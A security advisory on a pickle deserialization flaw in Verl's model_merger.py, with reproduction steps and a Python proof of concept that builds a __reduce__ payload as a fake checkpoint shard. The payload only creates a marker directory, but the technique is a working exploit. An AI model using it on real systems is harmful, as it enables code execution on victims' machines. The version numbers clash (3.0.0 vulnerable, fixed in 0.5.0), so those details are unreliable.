Volcengine Verl Deserialization Vulnerability in Model Merger Script Allowing Remote Code Execution

Vulnerability

A deserialization vulnerability has been identified in Volcengine's Verl library version 3.0.0, specifically within the model_merger.py script. When the script is run with the 'fsdp' backend, it loads the sharded checkpoint files (.pt) found in the user-supplied model directory with torch.load() and weights_only set to False. In that mode torch.load() hands the file to Python's pickle machinery, and a pickle stream can instruct the unpickler to import and call arbitrary callables (for example through an object's __reduce__ method), so a crafted .pt file executes attacker-chosen code the moment it is loaded, before any weights are merged. An attacker only needs to get the victim to point the merger at a directory containing the malicious file, for example a checkpoint obtained from an untrusted source; no memory corruption or further interaction is required, and the code runs with the privileges of the user who launched the script.

Impact

Exploitation of this vulnerability gives the attacker arbitrary code execution on the host where model_merger.py is run, with the same privileges as the user executing the script. Because checkpoint directories are routinely shared between machines and downloaded from model hubs, a poisoned checkpoint can compromise every training or serving host that merges it.

Reproduction

To reproduce this vulnerability, first create a file named 'malicious.pt' whose pickle payload runs a command when unpickled, such as creating a directory. Place the file in a directory named 'TESTS' and rename it to 'model_world_size_4_rank_0.pt' so that it matches the sharded-checkpoint filename pattern the 'fsdp' backend looks for. Finally, run the model_merger.py script with the 'fsdp' backend, specifying the 'TESTS' directory as the local model path. The payload executes inside torch.load() while the shard is being deserialized; the directory it creates confirms code execution.
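The following is an added example, not code from the original report or from the verl project, that shows the mechanism behind the reproduction steps above in a self-contained form. torch.load(weights_only=False) unpickles the checkpoint with full pickle semantics, so the example builds the malicious file with plain pickle instead of torch.save (which pickles arbitrary Python objects the same way) and places it under a constructed TESTS directory with the expected shard name. It then loads the file twice: once with an unrestricted pickle.load, mirroring weights_only=False, and once through an allow-list unpickler that stands in for the restricted loader torch uses when weights_only=True. The allow-list contents, the temporary paths and the marker directory are assumptions chosen for the demonstration.

```python
import os
import pickle
import shutil
import tempfile


class MaliciousPayload:
    """Constructed attacker object. Pickle records __reduce__'s return value
    as "call os.makedirs(marker_dir)", which the unpickler executes at load
    time. The class itself is not needed on the victim side."""

    def __init__(self, marker_dir):
        self.marker_dir = marker_dir

    def __reduce__(self):
        # (callable, args): any importable callable can go here, e.g. os.system
        return (os.makedirs, (self.marker_dir,))


def write_malicious_pt(path, marker_dir):
    """Write the attacker's 'checkpoint'. With torch installed this would be
    torch.save(MaliciousPayload(marker_dir), path); the pickle stream inside
    is equivalent for the purpose of this demonstration."""
    with open(path, "wb") as f:
        pickle.dump(MaliciousPayload(marker_dir), f, protocol=2)
    return path


def load_like_weights_only_false(path):
    """Mirrors torch.load(path, weights_only=False): an unrestricted unpickle.
    Every GLOBAL reference in the stream is resolved and callable."""
    with open(path, "rb") as f:
        return pickle.load(f)


# Assumed allow-list: the kinds of globals a weights-only checkpoint needs.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Simplified stand-in for torch's weights_only unpickler: any global
    outside the allow-list aborts the load instead of being executed."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def load_like_weights_only_true(path):
    """Mirrors torch.load(path, weights_only=True) for this payload."""
    with open(path, "rb") as f:
        return RestrictedUnpickler(f).load()


def demo():
    """Returns (payload_ran_unrestricted, restricted_load_blocked,
    payload_ran_restricted)."""
    work = tempfile.mkdtemp(prefix="verl_poc_")
    try:
        model_dir = os.path.join(work, "TESTS")          # local model path
        os.makedirs(model_dir)
        marker = os.path.join(work, "pwned")              # created by payload
        shard = os.path.join(model_dir, "model_world_size_4_rank_0.pt")
        write_malicious_pt(shard, marker)

        load_like_weights_only_false(shard)
        unsafe_hit = os.path.isdir(marker)
        if unsafe_hit:
            os.rmdir(marker)

        try:
            load_like_weights_only_true(shard)
            blocked = False
        except pickle.UnpicklingError:
            blocked = True
        safe_hit = os.path.isdir(marker)
        return unsafe_hit, blocked, safe_hit
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print(demo())  # expected: (True, True, False)
```

The unrestricted load creates the marker directory without any tensor ever being constructed, which is exactly what a real exploit relies on; the restricted loader fails at the first disallowed global and never reaches the payload. In code that must keep loading checkpoints, the matching fix is to call torch.load(..., weights_only=True) and to treat any checkpoint that fails that load as untrusted rather than falling back to weights_only=False.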

Remediation

Users are advised to upgrade to Volcengine Verl version 0.5.0 or later, where this vulnerability has been addressed. Separately, PyTorch 2.6.0 and later change the default of torch.load() to weights_only=True, which rejects pickle streams that reference anything outside an allow-list of tensor and container types. That default limits the damage of any remaining unguarded torch.load() call, but an explicit weights_only=False still disables the protection, so checkpoints from untrusted sources should never be loaded that way regardless of the PyTorch version.

Added: Aug 19, 2025, 2:19 PM
Updated: Aug 19, 2025, 2:19 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 5.8
remediation: 7.7
relevance: 0.4
threat: 6.4
urgency: 2.9
incentive: 0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.